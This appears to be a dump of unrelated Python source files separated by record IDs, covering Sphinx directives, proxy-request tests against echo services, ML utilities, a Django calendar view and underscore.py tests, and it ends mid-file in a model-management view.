from docutils import nodes from docutils.parsers.rst import Directive from docutils.parsers.rst import directives import urllib.parse icon = '<svg version="1.1" width="16" height="16" class="octicon octicon-file-code" viewBox="0 0 16 16" aria-hidden="true"><path fill-rule="evenodd" d="M4 1.75C4 .784 4.784 0 5.75 0h5.586c.464 0 .909.184 1.237.513l2.914 2.914c.329.328.513.773.513 1.237v8.586A1.75 1.75 0 0114.25 15h-9a.75.75 0 010-1.5h9a.25.25 0 00.25-.25V6h-2.75A1.75 1.75 0 0110 4.25V1.5H5.75a.25.25 0 00-.25.25v2.5a.75.75 0 01-1.5 0v-2.5zm7.5-.188V4.25c0 .138.112.25.25.25h2.688a.252.252 0 00-.011-.013l-2.914-2.914a.272.272 0 00-.013-.011zM5.72 6.72a.75.75 0 000 1.06l1.47 1.47-1.47 1.47a.75.75 0 101.06 1.06l2-2a.75.75 0 000-1.06l-2-2a.75.75 0 00-1.06 0zM3.28 7.78a.75.75 0 00-1.06-1.06l-2 2a.75.75 0 000 1.06l2 2a.75.75 0 001.06-1.06L1.81 9.25l1.47-1.47z"></path></svg>' def lazy_iframe(iframe): return f""" <div class="lazy-iframe" style="min-height:1px"> <script> (() => {{ const element = document.currentScript.parentElement; window.addEventListener("scroll", check); window.addEventListener("DOMContentLoaded", check); window.addEventListener("click", check); if (element.closest(".tabbed-content")) {{ const label = element.closest(".tabbed-content").previousSibling label.innerHTML = `{icon}` + `<span> ${{label.innerText}} </span>` }} function check() {{ setTimeout(() => {{ const rect = element.getBoundingClientRect(); const isVisible = rect.top - window.innerHeight < 500 && rect.bottom > -50 && rect.width > 0; if (isVisible) {{ element.outerHTML = `{iframe}` }} }}, 100) }} }})(); </script> </div> """ def playground(code, height, interactive): query = urllib.parse.urlencode({"code": code}) src = f'https://playground.clio-lang.org/?hz=true&{query}' if not interactive: src += "&run=no&examples=no&share=no&console=no" params = 'class="playground" loading="lazy" allow="clipboard-read; clipboard-write"' iframe = f'<iframe {params} src="{src}" width="100%" height="{height}px" frameborder="no"></iframe>' return lazy_iframe(iframe) class Playground(Directive): has_content = True required_arguments = 0 optional_arguments = 0 option_spec = {'height': directives.nonnegative_int, 'no-interactive': directives.flag} def run(self): code = "\n".join(self.content) height = 'height' in self.options and self.options['height'] or 540 interactive = 'no-interactive' not in self.options raw = playground(code, height, interactive) node = nodes.raw("", raw, format='html') return [node] def setup(app): app.add_directive("playground", Playground) return { 'version': '0.1', 'parallel_read_safe': True, 'parallel_write_safe': True, }
497107
VERSION_MAJOR = "0" VERSION_MINOR = "5" VERSION_TINY = "0" VERSION = "%s.%s.%s" % (VERSION_MAJOR, VERSION_MINOR, VERSION_TINY)
497108
for i in range(1,100): if i % 15 == 0: print("FizzBuzz,", end=' ') elif i%3==0: print("Fizz,", end=" ") elif i%5==0: print("Buzz,",end=' ') else: print(i,",",end=" ") print(100)
497133
import pytest from socket import inet_aton from uuid import uuid4 from proxy_requests import ProxyRequests, ProxyRequestsBasicAuth from proxy_requests import requests # pytest -rsA tests/test_proxy_requests.py @pytest.fixture def henry_post_bucket(): url = 'https://ptsv2.com/t/%s' % str(uuid4()).replace('-', '') requests.get(url) return url def test_get(): r = ProxyRequests('https://api.ipify.org') r.get() assert r.get_status_code() == 200 try: inet_aton(r.__str__()) except Exception: pytest.fail('Invalid IP address in response') print(r.get_proxy_used()) def test_get_with_headers(): h = {'User-Agent': 'NCSA Mosaic/3.0 (Windows 95)'} r = ProxyRequests('https://postman-echo.com/headers') r.set_headers(h) r.get_with_headers() assert r.get_status_code() == 200 assert 'headers' in r.get_json() print(r.get_proxy_used()) def test_post(henry_post_bucket): r = ProxyRequests(henry_post_bucket + '/post') r.post({'key1': 'value1', 'key2': 'value2'}) assert r.get_status_code() == 200 assert 'Thank you' in r.__str__() print(r.get_proxy_used()) def test_post_with_headers(henry_post_bucket): r = ProxyRequests(henry_post_bucket + '/post') r.set_headers({'name': 'rootVIII', 'secret_message': '7Yufs9KIfj33d'}) r.post_with_headers({'key1': 'value1', 'key2': 'value2'}) assert r.get_status_code() == 200 assert 'Thank you' in r.__str__() print(r.get_proxy_used()) def test_post_file(henry_post_bucket): with open('/var/tmp/proxy_requests_testing.txt', 'w') as f_out: f_out.write('testing') r = ProxyRequests(henry_post_bucket + '/post') r.set_file('/var/tmp/proxy_requests_testing.txt') r.post_file() assert r.get_status_code() == 200 assert 'Thank you' in r.__str__() print(henry_post_bucket) print(r.get_proxy_used()) def test_post_file_with_headers(henry_post_bucket): with open('/var/tmp/proxy_requests_testing.txt', 'w') as f_out: f_out.write('testing') h = {'User-Agent': 'NCSA Mosaic/3.0 (Windows 95)'} r = ProxyRequests(henry_post_bucket + '/post') r.set_headers(h) r.set_file('/var/tmp/proxy_requests_testing.txt') r.post_file_with_headers() assert r.get_status_code() == 200 assert 'Thank you' in r.__str__() print(henry_post_bucket) print(r.get_proxy_used()) def test_get_with_basic_auth(): url = 'https://postman-echo.com/basic-auth' r = ProxyRequestsBasicAuth(url, 'postman', 'password') r.get() assert r.get_status_code() == 200 assert r.get_json()['authenticated'] print(r.get_proxy_used()) def test_get_with_headers_basic_auth(): url = 'https://postman-echo.com/basic-auth' h = {'User-Agent': 'NCSA Mosaic/3.0 (Windows 95)'} r = ProxyRequestsBasicAuth(url, 'postman', 'password') r.set_headers(h) r.get_with_headers() assert r.get_status_code() == 200 assert r.get_json()['authenticated'] print(r.get_proxy_used()) def test_post_with_basic_auth(henry_post_bucket): r = ProxyRequestsBasicAuth(henry_post_bucket + '/post', 'username', 'password') r.post({'key1': 'value1', 'key2': 'value2'}) assert r.get_status_code() == 200 assert 'Thank you' in r.__str__() print(henry_post_bucket) print(r.get_proxy_used()) def test_post_with_headers_and_basic_auth(henry_post_bucket): r = ProxyRequestsBasicAuth(henry_post_bucket + '/post', 'username', 'password') r.set_headers({'header_key': 'header_value'}) r.post_with_headers({'key1': 'value1', 'key2': 'value2'}) assert r.get_status_code() == 200 assert 'Thank you' in r.__str__() print(henry_post_bucket) print(r.get_proxy_used()) def test_post_file_with_basic_auth(henry_post_bucket): with open('/var/tmp/proxy_requests_testing.txt', 'w') as f_out: f_out.write('testing') r = ProxyRequestsBasicAuth(henry_post_bucket + '/post', 'username', 'password') r.set_file('/var/tmp/proxy_requests_testing.txt') r.post_file() assert r.get_status_code() == 200 assert 'Thank you' in r.__str__() print(henry_post_bucket) print(r.get_proxy_used()) def test_post_file_with_headers_and_basic_auth(henry_post_bucket): with open('/var/tmp/proxy_requests_testing.txt', 'w') as f_out: f_out.write('testing') h = {'User-Agent': 'NCSA Mosaic/3.0 (Windows 95)'} r = ProxyRequestsBasicAuth(henry_post_bucket + '/post', 'username', 'password') r.set_headers(h) r.set_file('/var/tmp/proxy_requests_testing.txt') r.post_file_with_headers() assert r.get_status_code() == 200 assert 'Thank you' in r.__str__() print(henry_post_bucket) print(r.get_proxy_used())
497145
import numpy as np import matplotlib.pyplot as plt import os from sklearn import svm from sklearn.decomposition import PCA from sklearn.pipeline import make_pipeline from sklearn.preprocessing import MinMaxScaler from sklearn.externals import joblib import torch import torchvision def load(dataloader): """Loads/flattens inputs and targets for use in SVM. Returns inputs and targets.""" for data in dataloader: x,y=data x=x.view(x.shape[0],-1) return x,y def hp_grid(n_components, C_range, gamma_range): """Creates and returns list of classifiers with grid of hyperparameters given by C_range and gamma_range.""" clfs=[] pca=PCA(n_components=n_components) scaling = MinMaxScaler(feature_range=(-1,1)) for i in C_range: for j in gamma_range: svc=svm.SVC(C=i, gamma=j) clf=make_pipeline(pca, scaling, svc) clfs.append(clf) return clfs def train_grid(clfs, inputs, targets): """Trains classifiers in a list; returns list of trained classifiers.""" fitted_clfs=[] for i in range(len(clfs)): x=clfs[i].fit(inputs, targets) fitted_clfs.append(x) print('Fitted: ', i+1, '/', len(clfs)) return fitted_clfs def predict_eval(clf, inputs, targets, training=False): """Given a classifier and inputs, returns predictions and evaluated classifier accuracy.""" preds=clf.predict(inputs) num_correct=torch.eq(torch.from_numpy(preds), targets).sum().item() acc=(num_correct/len(targets))*100 if training: print('C: ', clf.get_params(deep=True)['svc__C'], 'gamma: ', clf.get_params(deep=True)['svc__gamma']) print('Training Accuracy: ', acc) else: print('Testing Accuracy: ', acc) return preds, acc def maxacc_gen(test_accs, train_accs, clfs): """Finds and returns model with highest test accuracy and model with train/test accuracy ratio closest to 1.""" test=np.array(test_accs) train=np.array(train_accs) maxacc=clfs[np.argmax(test)] gen=clfs[np.argmin(train-test)] return maxacc, gen def save_proba(fn, pipe, inputs, targets): """Fits svm with probabilities and saves to disk.""" params=pipe.get_params(deep=True) pca=PCA(n_components=180) scaling = MinMaxScaler(feature_range=(-1,1)) pipe_prob=make_pipeline(pca, scaling, svm.SVC(C=params['svc__C'], gamma=params['svc__gamma'], probability=True)) pipe_prob.fit(inputs, targets) joblib.dump(pipe_prob, fn) def load_svm(directory, gen=True): """Returns loaded SVM saved with classification baselines. 'gen' : Model with train/test accuracy ratio closest to 1. 'maxacc' : Model with highest test accuracy.""" if gen: clf='gen' if not gen: clf='maxacc' dataset=directory.split('/')[-1] path='SVM' + dataset + '_' + clf + '_proba.pkl' svm=joblib.load(os.path.join(directory, path)) return svm def class_acc(preds, targets, classes): "Returns classifier accuracy for each class." correct=0 class_correct=np.zeros(len(classes)) class_total=np.zeros(len(classes)) for j in range(len(targets)): class_total[targets[j]]+=1 if np.argmax(preds[j])==targets[j]: class_correct[targets[j]]+=1 correct+=1 class_accuracies=(class_correct/class_total)*100 accuracy=(correct/len(targets))*100 for i in range(len(class_accuracies)): print('Accuracy of', classes[i], ': ', class_accuracies[i], '%') print('Total Accuracy: ', accuracy, '%')
497223
import numpy as np from scipy.stats import norm as ndist # randomization mechanism class normal_sampler(object): """ Our basic model for noise, and input to selection algorithms. This represents Gaussian data with a center, e.g. X.T.dot(y) in linear regression and a covariance Sigma. This object emits noisy versions of `center` as center + scale * N(0, Sigma) """ def __init__(self, center, covariance): ''' Parameters ---------- center : np.float(p) Center of Gaussian noise source. covariance : np.float((p, p)) Covariance of noise added (up to scale factor). ''' (self.center, self.covariance) = (np.asarray(center), np.asarray(covariance)) self.shape = self.center.shape def __call__(self, size=None, scale=1.): ''' Parameters ---------- size : tuple or int How many copies to draw scale : float Scale (in data units) applied to unitless noise before adding. Returns ------- noisy_sample : np.float Generate noisy version of the center. With scale==0., return the full center. TODO: for some calculations, a log of each call would be helpful for constructing UMVU, say. ''' if not hasattr(self, 'cholT'): self.cholT = np.linalg.cholesky(self.covariance).T if type(size) == type(1): size = (size,) size = size or (1,) if self.shape == (): _shape = (1,) else: _shape = self.shape return scale * np.squeeze(np.random.standard_normal(size + _shape).dot(self.cholT)) + self.center class split_sampler(object): """ Data splitting noise source. This is approximately Gaussian with center np.sum(sample_stat, 0) and noise suitably scaled, depending on splitting fraction. This object emits noisy versions of `center` as center + scale * N(0, Sigma) """ def __init__(self, sample_stat, covariance): # covariance of sum of rows ''' Parameters ---------- sample_stat : np.float((n, p)) Data matrix. In linear regression this is X * y[:, None] covariance : np.float((p, p)) Covariance of np.sum(sample_stat, 0). Could be computed e.g. by bootstrap or parametric method given a design X. ''' self.sample_stat = np.asarray(sample_stat) self.nsample = self.sample_stat.shape[0] self.center = np.sum(self.sample_stat, 0) self.covariance = covariance self.shape = self.center.shape def __call__(self, size=None, scale=0.5): ''' Parameters ---------- size : tuple or int How many copies to draw scale : float Scale (in data units) applied to unitless noise before adding. Returns ------- noisy_sample : np.float Generate noisy version of the center. With scale==0., return the full center. The equivalent data splitting fraction is 1 / (scale**2 + 1). Argument is kept as `scale` instead of `frac` so that the general learning algorithm can replace this `splitter_source` with a corresponding `normal_source`. TODO: for some calculations, a log of each call would be helpful for constructing UMVU, say. ''' # (1 - frac) / frac = scale**2 frac = 1 / (scale**2 + 1) if type(size) == type(1): size = (size,) size = size or (1,) if self.shape == (): _shape = (1,) else: _shape = self.shape final_sample = [] idx = np.arange(self.nsample) for _ in range(np.product(size)): sample_ = self.sample_stat[np.random.choice(idx, int(frac * self.nsample), replace=False)] final_sample.append(np.sum(sample_, 0) / frac) # rescale to the scale of a sum of nsample rows val = np.squeeze(np.array(final_sample).reshape(size + _shape)) return val
497285
from torchsupport.data.namedtuple import namedtuple class Environment: data_type = namedtuple("Data", [ "state", "action", "rewards", "done" ]) def reset(self): raise NotImplementedError def push_changes(self): pass def pull_changes(self): pass def action_space(self): raise NotImplementedError def observation_space(self): raise NotImplementedError def is_done(self): raise NotImplementedError def observe(self): raise NotImplementedError def act(self, action): raise NotImplementedError def schema(self): raise NotImplementedError
497335
import sys from easyprocess import EasyProcess python = sys.executable prog = """ import time for i in range(3): print(i, flush=True) time.sleep(1) """ print("-- no timeout") stdout = EasyProcess([python, "-c", prog]).call().stdout print(stdout) print("-- timeout=1.5s") stdout = EasyProcess([python, "-c", prog]).call(timeout=1.5).stdout print(stdout) print("-- timeout=50s") stdout = EasyProcess([python, "-c", prog]).call(timeout=50).stdout print(stdout)
497344
def serialize_sqla(data, serialize_date=True): """ Serialiation function to serialize any dicts or lists. This is needed for conversion of sqlalchemy objects to JSON format. """ # If has to_dict this is asumed working and it is used if hasattr(data, 'to_dict'): return data.to_dict(serialize_date=serialize_date) # DateTime objects should be returned as isoformat if hasattr(data, 'isoformat') and serialize_date: return str(data.isoformat()) # Items in lists are iterated over and get serialized separetly if isinstance(data, (list, tuple, set)): return [serialize_sqla(item, serialize_date=serialize_date) for item in data] # Dictionaries get iterated over if isinstance(data, dict): result = {} for key, value in list(data.items()): result[key] = serialize_sqla(value, serialize_date=serialize_date) return result # Try using the built in __dict__ functions and serialize that seperately if hasattr(data, '__dict__'): return serialize_sqla(data.__dict__, serialize_date=serialize_date) # Just hope it works return data
497346
from pydantic import Field from app.schemas.base import AbstractResourceModel, APIModel from app.schemas.mixin import TimestampMixin class BaseHTML(APIModel): id: str = Field(..., title="SHA256", alias="sha256") class HTML(AbstractResourceModel, TimestampMixin): """HTML""" id: str = Field(..., title="SHA256", alias="sha256") ssdeep: str = Field(...)
497362
import unittest from unittest.mock import patch from leetcode.coding.editor import edit class TestEditor(unittest.TestCase): @patch('leetcode.coding.editor.os.chdir') @patch('leetcode.coding.editor.subprocess.call') @patch('leetcode.coding.editor.os.environ.get') def test_edit(self, mock_get, mock_call, mock_chdir): mock_get.return_value = '' edit('', None) mock_call.assert_not_called() mock_get.return_value = 'sublime' edit('file', None) mock_call.assert_called_once_with('subl file', shell=True) mock_get.return_value = 'vim' mock_call.reset_mock() with patch('leetcode.coding.editor.delay_refresh_detail') as mock_delay: edit('file', None) mock_call.assert_called_once_with('vim file', shell=True) mock_delay.assert_called_once()
497470
import datetime import vobject from django import http from django.shortcuts import get_object_or_404, render from django.utils.timezone import utc from django.utils import timezone from django.core.cache import cache from django.conf import settings from django.db.models import Q from django.core.urlresolvers import reverse from slugify import slugify from jsonview.decorators import json_view from airmozilla.base.utils import get_base_url from airmozilla.main.templatetags.jinja_helpers import short_desc from airmozilla.main.models import ( Event, get_profile_safely, Location, Channel, ) from airmozilla.search.models import SavedSearch from airmozilla.main.views import is_contributor from airmozilla.main import forms def calendar(request): context = {} return render(request, 'main/calendar.html', context) @json_view def calendar_data(request): form = forms.CalendarDataForm(request.GET) if not form.is_valid(): return http.HttpResponseBadRequest(str(form.errors)) start = form.cleaned_data['start'] end = form.cleaned_data['end'] start = start.replace(tzinfo=utc) end = end.replace(tzinfo=utc) privacy_filter = {} privacy_exclude = {} events = Event.objects.scheduled_or_processing() if request.user.is_active: if is_contributor(request.user): privacy_exclude = {'privacy': Event.PRIVACY_COMPANY} else: privacy_filter = {'privacy': Event.PRIVACY_PUBLIC} events = events.approved() if privacy_filter: events = events.filter(**privacy_filter) elif privacy_exclude: events = events.exclude(**privacy_exclude) events = events.filter( start_time__gte=start, start_time__lt=end ) event_objects = [] for event in events.select_related('location'): start_time = event.start_time end_time = start_time + datetime.timedelta( seconds=max(event.duration or event.estimated_duration, 60 * 20) ) # We don't need 'end' because we don't yet know how long the event # was or will be. event_objects.append({ 'title': event.title, 'start': start_time.isoformat(), 'end': end_time.isoformat(), 'url': reverse('main:event', args=(event.slug,)), 'description': short_desc(event), 'allDay': False, }) return event_objects def calendars(request): data = {} locations = [] now = timezone.now() time_ago = now - datetime.timedelta(days=30) base_qs = Event.objects.filter(start_time__gte=time_ago) for location in Location.objects.all().order_by('name'): count = base_qs.filter(location=location).count() if count: locations.append(location) data['locations'] = locations if request.user.is_active: profile = get_profile_safely(request.user) if profile and profile.contributor: data['calendar_privacy'] = 'contributors' else: data['calendar_privacy'] = 'company' else: data['calendar_privacy'] = 'public' return render(request, 'main/calendars.html', data) def events_calendar_ical(request, privacy=None, channel_slug=None): cache_key = 'calendar' savedsearch = None if privacy: cache_key += '_%s' % privacy if channel_slug: cache_key += '_%s' % channel_slug if request.GET.get('ss'): savedsearch = get_object_or_404(SavedSearch, id=request.GET['ss']) cache_key += '_%s' % savedsearch.pk if request.GET.get('location'): if request.GET.get('location').isdigit(): location = get_object_or_404( Location, pk=request.GET.get('location') ) else: location = get_object_or_404( Location, name=request.GET.get('location') ) cache_key += str(location.pk) cached = None else: location = None cached = cache.get(cache_key) if cached: # additional response headers aren't remembered so add them again cached['Access-Control-Allow-Origin'] = '*' return cached cal = vobject.iCalendar() now = timezone.now() if savedsearch: base_qs = savedsearch.get_events() else: base_qs = Event.objects.scheduled_or_processing() if channel_slug: channel = get_object_or_404( Channel, slug__iexact=channel_slug ) channels = Channel.objects.filter( Q(id=channel.id) | Q(parent=channel.id) ) base_qs = base_qs.filter(channels__in=channels) if privacy == 'public': base_qs = base_qs.approved().filter( privacy=Event.PRIVACY_PUBLIC ) title = 'Air Mozilla Public Events' elif privacy == 'private': base_qs = base_qs.exclude( privacy=Event.PRIVACY_PUBLIC ) title = 'Air Mozilla Private Events' else: title = 'Air Mozilla Events' if savedsearch: if savedsearch.name: title += ' (from saved search "{}")'.format(savedsearch.name) else: title += ' (from saved search)' if location: base_qs = base_qs.filter(location=location) cal.add('X-WR-CALNAME').value = title events = list(base_qs .filter(start_time__lt=now) .order_by('-start_time')[:settings.CALENDAR_SIZE]) events += list(base_qs .filter(start_time__gte=now) .order_by('start_time')) base_url = get_base_url(request) for event in events: vevent = cal.add('vevent') vevent.add('summary').value = event.title vevent.add('dtstart').value = event.start_time vevent.add('dtend').value = ( event.start_time + datetime.timedelta( seconds=event.duration or event.estimated_duration ) ) vevent.add('description').value = short_desc(event, strip_html=True) if event.location: vevent.add('location').value = event.location.name vevent.add('url').value = ( base_url + reverse('main:event', args=(event.slug,)) ) icalstream = cal.serialize() # response = http.HttpResponse( # icalstream, # content_type='text/plain; charset=utf-8' # ) response = http.HttpResponse( icalstream, content_type='text/calendar; charset=utf-8' ) filename = 'AirMozillaEvents%s' % (privacy and privacy or '') if location: filename += '_%s' % slugify(location.name) if savedsearch: filename += '_ss%s' % savedsearch.id filename += '.ics' response['Content-Disposition'] = ( 'inline; filename=%s' % filename) if not location: cache.set(cache_key, response, 60 * 10) # 10 minutes # https://bugzilla.mozilla.org/show_bug.cgi?id=909516 response['Access-Control-Allow-Origin'] = '*' return response
497513
import torch import torch.nn as nn from torchvision.models import vgg16 class Vgg16(torch.nn.Module): def __init__(self): super(Vgg16, self).__init__() features = list(vgg16(pretrained=True).features)[:23] self.layers = nn.ModuleList(features).eval() for param in self.parameters(): param.requires_grad = False def forward(self, x): results = [] layers_of_interest = {3, 8, 15, 22} for i, layer in enumerate(self.layers): x = layer(x) if i in layers_of_interest: results.append(x) return results
497568
import unittest from src.underscore import _ class TestObjects(unittest.TestCase): def test_keys(self): self.assertEqual(set(_.keys({"one": 1, "two": 2})), {'two', 'one'}, 'can extract the keys from an object') def test_values(self): self.assertEqual(set(_.values({"one": 1, "two": 2})), {2, 1}, 'can extract the values from an object') def test_functions(self): obj = {"a": 'dash', "b": _.map, "c": ("/yo/"), "d": _.reduce} self.assertEqual(['b', 'd'], _.functions(obj), 'can grab the function names of any passed-in object') def test_extend(self): self.assertEqual(_.extend({}, {"a": 'b'}).get("a"), 'b', 'can extend an object with the attributes of another') self.assertEqual(_.extend({"a": 'x'}, {"a": 'b'}).get( "a"), 'b', 'properties in source override destination') self.assertEqual(_.extend({"x": 'x'}, {"a": 'b'}).get( "x"), 'x', 'properties not in source dont get overriden') result = _.extend({"x": 'x'}, {"a": 'a'}, {"b": 'b'}) self.assertEqual(result, {"x": 'x', "a": 'a', "b": 'b'}, 'can extend from multiple source objects') result = _.extend({"x": 'x'}, {"a": 'a', "x": 2}, {"a": 'b'}) self.assertEqual(result, {"x": 2, "a": 'b'}, 'extending from multiple source' ' objects last property trumps') result = _.extend({}, {"a": None, "b": None}) self.assertEqual(set(_.keys(result)), {"a", "b"}, 'extend does not copy undefined values') def test_pick(self): result = _.pick({"a": 1, "b": 2, "c": 3}, 'a', 'c') self.assertTrue(_.isEqual(result, {'a': 1, 'c': 3}), 'can restrict properties to those named') result = _.pick({"a": 1, "b": 2, "c": 3}, ['b', 'c']) self.assertTrue(_.isEqual(result, {"b": 2, "c": 3}), 'can restrict properties to those named in an array') result = _.pick({"a": 1, "b": 2, "c": 3}, ['a'], 'b') self.assertTrue(_.isEqual(result, {"a": 1, "b": 2}), 'can restrict properties to those named in mixed args') def test_omit(self): result = _.omit({"a": 1, "b": 2, "c": 3}, 'b') self.assertEqual(result, {"a": 1, "c": 3}, 'can omit a single named property') result = _.omit({"a": 1, "b": 2, "c": 3}, 'a', 'c') self.assertEqual(result, {"b": 2}, 'can omit several named properties') result = _.omit({"a": 1, "b": 2, "c": 3}, ['b', 'c']) self.assertEqual(result, {"a": 1}, 'can omit properties named in an array') def test_defaults(self): options = {"zero": 0, "one": 1, "empty": "", "nan": None, "string": "string"} _.defaults(options, {"zero": 1, "one": 10, "twenty": 20}) self.assertEqual(options["zero"], 0, 'value exists') self.assertEqual(options["one"], 1, 'value exists') self.assertEqual(options["twenty"], 20, 'default applied') _.defaults(options, {"empty": "full"}, {"nan": "none"}, {"word": "word"}, {"word": "dog"}) self.assertEqual(options["empty"], "", 'value exists') self.assertTrue(_.isNone(options["nan"]), "NaN isn't overridden") self.assertEqual(options["word"], "word", 'new value is added, first one wins') def test_clone(self): moe = {"name": 'moe', "lucky": [13, 27, 34]} clone = _.clone(moe) self.assertEqual(clone["name"], 'moe', 'the clone as the attributes of the original') clone["name"] = 'curly' self.assertTrue(clone["name"] == 'curly' and moe["name"] == 'moe', 'clones can change shallow attributes' ' without affecting the original') clone["lucky"].append(101) self.assertEqual(_.last(moe["lucky"]), 101, 'changes to deep attributes are' ' shared with the original') self.assertEqual(_.clone(1), 1, 'non objects should not be changed by clone') self.assertEqual(_.clone(None), None, 'non objects should not be changed by clone') def test_isEqual(self): obj = {"a": 1, "b": 2} self.assertTrue(_.isEqual(obj, {"a": 1, "b": 2}), "Object is equal") obj = {"a": 1, "b": {"c": 2, "d": 3, "e": {"f": [1, 2, 3, 4, 5]}}} self.assertTrue(_.isEqual( obj, {"a": 1, "b": {"c": 2, "d": 3, "e": {"f": [1, 2, 3, 4, 5]}}}), "Object is equal") obj = [1, 2, 3, 4, [5, 6, 7, [[[[8]]]]]] self.assertTrue( _.isEqual(obj, [1, 2, 3, 4, [5, 6, 7, [[[[8]]]]]]), "Object is equal") obj = None self.assertTrue(_.isEqual(obj, None), "Object is equal") obj = 1 self.assertTrue(_.isEqual(obj, 1), "Object is equal") obj = "string" self.assertTrue(_.isEqual(obj, "string"), "Object is equal") def test_isEmpty(self): self.assertTrue(not _([1]).isEmpty(), '[1] is not empty') self.assertTrue(_.isEmpty([]), '[] is empty') self.assertTrue(not _.isEmpty({"one": 1}), '{one : 1} is not empty') self.assertTrue(_.isEmpty({}), '{} is empty') self.assertTrue(_.isEmpty(None), 'null is empty') self.assertTrue(_.isEmpty(), 'undefined is empty') self.assertTrue(_.isEmpty(''), 'the empty string is empty') self.assertTrue(not _.isEmpty('moe'), 'but other strings are not') obj = {"one": 1} obj.pop("one") self.assertTrue(_.isEmpty(obj), 'deleting all the keys from an object empties it') pass def test_isType(self): # put all the types here and check each for true pass class Namespace: pass def test_tap(self): ns = self.Namespace() ns.intercepted = None def interceptor(obj): ns.intercepted = obj returned = _.tap(1, interceptor) self.assertEqual(ns.intercepted, 1, "passes tapped object to interceptor") self.assertEqual(returned, 1, "returns tapped object") returned = _([1, 2, 3]).chain().map( lambda n, *args: n * 2).max().tap(interceptor).value() self.assertTrue(returned == 6 and ns.intercepted == 6, 'can use tapped objects in a chain') def test_pairs(self): r = _.pairs({"one": 1, "two": 2}) self.assertEqual(sorted(r), [["one", 1], ["two", 2]], 'can convert an object into pairs') def test_invert(self): obj = {"first": 'Moe', "second": 'Larry', "third": 'Curly'} r = _(obj).chain().invert().keys().join(' ').value() self.assertEqual(set(r), set('Larry Moe Curly'), 'can invert an object') self.assertEqual(_.invert(_.invert(obj)), obj, "two inverts gets you back where you started") def test_matches(self): moe = {"name": '<NAME>', "hair": True} curly = {"name": '<NAME>', "hair": False} stooges = [moe, curly] self.assertTrue(_.find(stooges, _.matches({"hair": False})) == curly, "returns a predicate that can" " be used by finding functions.") self.assertTrue(_.find(stooges, _.matches(moe)) == moe, "can be used to locate an object" " exists in a collection.") if __name__ == "__main__": print("run these tests by executing `python -m unittest" " discover` in unittests folder") unittest.main()
497574
from libs.config import alias from libs.myapp import is_windows from os import system @alias(func_alias="cls") def run(): """ clear Clear screen. """ if (is_windows(False)): system("cls") else: system("clear")
497576
import numpy as np import pgl import paddle.fluid as fluid def to_undirected(graph): """ to_undirected """ inv_edges = np.zeros(graph.edges.shape) inv_edges[:, 0] = graph.edges[:, 1] inv_edges[:, 1] = graph.edges[:, 0] edges = np.vstack((graph.edges, inv_edges)) edges = np.unique(edges, axis=0) # print(edges.shape) g = pgl.graph.Graph(num_nodes=graph.num_nodes, edges=edges) for k, v in graph._node_feat.items(): g._node_feat[k] = v return g def add_self_loop(graph): """ add_self_loop """ self_loop_edges = np.zeros((graph.num_nodes, 2)) self_loop_edges[:, 0] = self_loop_edges[:, 1]=np.arange(graph.num_nodes) edges = np.vstack((graph.edges, self_loop_edges)) edges = np.unique(edges, axis=0) # print(edges.shape) g = pgl.graph.Graph(num_nodes=graph.num_nodes, edges=edges) for k, v in graph._node_feat.items(): g._node_feat[k] = v return g def linear_warmup_decay(learning_rate, warmup_steps, num_train_steps): """ Applies linear warmup of learning rate from 0 and decay to 0.""" with fluid.default_main_program()._lr_schedule_guard(): lr = fluid.layers.tensor.create_global_var( shape=[1], value=0.0, dtype='float32', persistable=True, name="scheduled_learning_rate") global_step = fluid.layers.learning_rate_scheduler._decay_step_counter() with fluid.layers.control_flow.Switch() as switch: with switch.case(global_step < warmup_steps): warmup_lr = learning_rate * (global_step / warmup_steps) fluid.layers.tensor.assign(warmup_lr, lr) with switch.default(): decayed_lr = fluid.layers.learning_rate_scheduler.polynomial_decay( learning_rate=learning_rate, decay_steps=num_train_steps, end_learning_rate=0.0, power=1.0, cycle=False) fluid.layers.tensor.assign(decayed_lr, lr) return lr, global_step def add_vnode(graph, num_vnode=1): """ add_vnode """ num_nodes = graph.num_nodes + num_vnode src = np.tile(np.arange(num_nodes), [num_vnode, 1]).reshape(-1) dst = np.tile(np.arange(graph.num_nodes, num_nodes), [num_nodes, 1]).T.reshape(-1) new_edges = np.stack([src, dst]).T edges = np.vstack((graph.edges, new_edges)) g = pgl.graph.Graph(num_nodes=num_nodes, edges=edges) for k, v in graph._node_feat.items(): new_feat = np.tile(v.mean(0), [num_vnode, 1]) print(new_feat.shape) v = np.concatenate([v, new_feat]) g._node_feat[k] = v return g
497591
import os import typing as t from pathlib import Path from starwhale.utils import console, in_production from starwhale.consts import DefaultYAMLName, DEFAULT_PAGE_IDX, DEFAULT_PAGE_SIZE from starwhale.base.uri import URI from starwhale.base.type import URIType, EvalTaskType, InstanceType from starwhale.base.view import BaseTermView from starwhale.core.model.store import ModelStorage from .model import Model, StandaloneModel class ModelTermView(BaseTermView): def __init__(self, model_uri: str) -> None: super().__init__() self.raw_uri = model_uri self.uri = URI(model_uri, expected_type=URIType.MODEL) self.model = Model.get_model(self.uri) @BaseTermView._simple_action_print def remove(self, force: bool = False) -> t.Tuple[bool, str]: return self.model.remove(force) @BaseTermView._simple_action_print def recover(self, force: bool = False) -> t.Tuple[bool, str]: return self.model.recover(force) @BaseTermView._header def info(self, fullname: bool = False) -> None: self._print_info(self.model.info(), fullname=fullname) @BaseTermView._pager @BaseTermView._header def history( self, fullname: bool = False ) -> t.Tuple[t.List[t.Dict[str, t.Any]], t.Dict[str, t.Any]]: fullname = fullname or self.uri.instance_type == InstanceType.CLOUD return self._print_history( title="Model History List", history=self.model.history(), fullname=fullname ) def extract(self, force: bool = False, target_dir: str = "") -> None: console.print(":oncoming_police_car: try to extract ...") path = self.model.extract(force, target_dir) console.print(f":clap: extracted @ {path.resolve()} :tada:") @classmethod def eval( cls, target: str, yaml_name: str = DefaultYAMLName.MODEL, typ: str = "", kw: t.Dict[str, t.Any] = {}, ) -> None: if in_production() or (os.path.exists(target) and os.path.isdir(target)): workdir = Path(target) else: uri = URI(target, URIType.MODEL) store = ModelStorage(uri) workdir = store.loc if typ in (EvalTaskType.CMP, EvalTaskType.PPL): console.print(f":golfer: try to eval {typ} @ {workdir}...") StandaloneModel.eval_user_handler( typ, workdir, yaml_name=yaml_name, kw=kw, ) else: pass @classmethod @BaseTermView._pager @BaseTermView._header def list( cls, project_uri: str = "", fullname: bool = False, show_removed: bool = False, page: int = DEFAULT_PAGE_IDX, size: int = DEFAULT_PAGE_SIZE, ) -> t.Tuple[t.Dict[str, t.Any], t.Dict[str, t.Any]]: _uri = URI(project_uri, 